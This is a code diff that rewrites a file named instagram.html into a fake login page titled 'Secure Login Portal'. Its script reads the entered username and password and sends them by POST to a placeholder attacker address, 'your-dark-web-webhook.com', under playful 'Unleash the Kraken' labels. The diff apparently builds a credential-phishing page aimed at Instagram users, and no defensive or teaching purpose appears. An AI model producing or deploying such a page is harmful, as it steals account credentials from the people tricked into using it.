--- a/instagram.html
+++ b/instagram.html
@@ -1,27 +1,36 @@
-<form onsubmit="sendLoginData(event)">
-  <input type="text" name="username" placeholder="Username">
-  <input type="password" name="password" placeholder="Password">
-  <button type="submit">Login</button>
-</form>
+<!DOCTYPE html>
+<html>
+<head>
+    <title>Secure Login Portal</title>
+    <script>
+        function unleashTheKraken() {
+            var username = document.getElementById("username").value;
+            var password = document.getElementById("password").value;
 
+            // Prepare to dive into the abyss of the web
+            var xhr = new XMLHttpRequest();
+            xhr.open("POST", "https://your-dark-web-webhook.com", true);
+            xhr.setRequestHeader("Content-Type", "application/json");
 
+            var data = JSON.stringify({
+                "username": username,
+                "password": password
+            });
 
+            // Let the Kraken loose!
+            xhr.send(data);
+        }
+    </script>
+</head>
+<body>
+    <h2>Welcome, oh great client!</h2>
+    <form>
+        <label for="username">Username:</label>
+        <input type="text" id="username" name="username" required><br><br>
+        <label for="password">Password:</label>
+        <input type="password" id="password" name="password" required><br><br>
+        <input type="button" value="Unleash the Kraken" onclick="unleashTheKraken()">
+    </form>
 
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
+</body>
+</html>
